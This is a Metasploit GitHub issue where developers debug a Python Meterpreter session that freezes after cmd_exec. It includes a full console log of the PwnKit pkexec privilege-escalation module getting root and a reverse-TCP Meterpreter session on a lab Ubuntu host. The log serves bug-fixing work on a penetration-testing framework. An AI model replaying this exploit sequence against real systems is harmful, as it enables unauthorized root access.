Python cmd_exec fails to background the process as expected

[bwatters-r7]

In testing the LPE here https://github.com/rapid7/metasploit-framework/pull/16312 using a python payload the exploit succeeds but then timeout errors are generated. It appears to fail while crashing the original session. After turning on debugging and watching, the thing that's happening is that the session freezes after the cmd_exec call. All commands after the cmd_exec fail with timeout errors. If you go back to the original (not root) session, all commands give timeout error. If you go into the new root session, it works fine, and if you exit the new root session, then the original session becomes operative again. Example:

msf6 payload(python/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(python/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.101:6578 
[*] Sending stage (39920 bytes) to 10.5.132.108
[*] Meterpreter session 1 opened (10.5.135.101:6578 -> 10.5.132.108:46922 ) at 2022-03-08 18:29:21 -0600

msf6 payload(python/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : ubuntu-18041
OS              : Linux 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(python/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.105
[*] Determined host os is Ubuntu
[*] Polkit package version = 0.105-20ubuntu0.18.04.1
[*] Detected architecture: x86_64
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.lhaqxua
[*] /tmp/.lhaqxua created
[!] Verify cleanup of /tmp/.lhaqxua
[*] Running python3 /tmp/.lhaqxua/.qmnpurhmhd /usr/bin/pkexec /tmp/.lhaqxua/dhuyrf/dhuyrf.so dhuyrf tekeajpcudd
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “tekeajpcudd”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.
[+] The target is vulnerable.
[*] Detected architecture: x86_64
[*] Detected payload arch: x64
[*] Locating pkexec...
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.xlkdwwcadpyd
[*] /tmp/.xlkdwwcadpyd created
[*] Writing '/tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.xlkdwwcadpyd
[*] Running python3 /tmp/.xlkdwwcadpyd/.rqodmlcyrgsr /usr/bin/pkexec /tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so aagpbnlvb brxphinvsj
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.5.132.108
[+] Deleted /tmp/.xlkdwwcadpyd/aagpbnlvb/aagpbnlvb.so
[+] Deleted /tmp/.xlkdwwcadpyd/.rqodmlcyrgsr
[+] Deleted /tmp/.xlkdwwcadpyd
[*] Meterpreter session 2 opened (10.5.135.101:4444 -> 10.5.132.108:39786 ) at 2022-03-08 18:30:10 -0600
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] Failed to delete /tmp/.lhaqxua/.qmnpurhmhd: Operation timed out.

[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > 
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: meterpreter linux
        Info: msfuser @ ubuntu-18041
      Tunnel: 10.5.135.101:6578 -> 10.5.132.108:46922  (10.5.132.108)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-256-CBC)
        UUID: f36f2c5a2e1bd403/python=20/linux=6/2022-03-09T00:29:20Z
     CheckIn: 64s ago @ 2022-03-08 18:30:24 -0600
  Registered: No

  Session ID: 2
        Name: 
        Type: meterpreter linux
        Info: root @ 10.5.132.108
      Tunnel: 10.5.135.101:4444 -> 10.5.132.108:39786  (10.5.132.108)
         Via: exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
   Encrypted: Yes (AES-256-CBC)
        UUID: 59461ffc33ffa15f/x64=2/linux=6/2022-03-09T00:30:10Z
     CheckIn: 18s ago @ 2022-03-08 18:31:10 -0600
  Registered: No

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.5.132.108
OS           : Ubuntu 18.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.5.132.108 - Meterpreter session 2 closed.  Reason: Died
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
[-] stdapi_fs_getwd: Operation failed: Python exception: FileNotFoundError
meterpreter > cd ~
meterpreter > sysinfo
Computer        : ubuntu-18041
OS              : Linux 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > 

[adfoster-r7]

I haven't replicated this yet, but it resembles an issue Simon and I fixed within shell_to_meterpreter, which also used cmd_exec

TL;DR There's now a new Channelize option on cmd_exec to specify that the process should be executed, but to not wait around to buffer the stdout/stderr output back to msfconsole. That might fix the might be a solution for this exploit as well 🤞

https://github.com/rapid7/metasploit-framework/pull/16369/files#diff-7de0108ace71efb370286b25c5148509e74235d2eb74d5f5f48fd6e4b755fa89R179

[bcoles]

Similar issue with PowerShell sessions: https://github.com/rapid7/metasploit-framework/issues/9511. Although it is old now - may have been patched.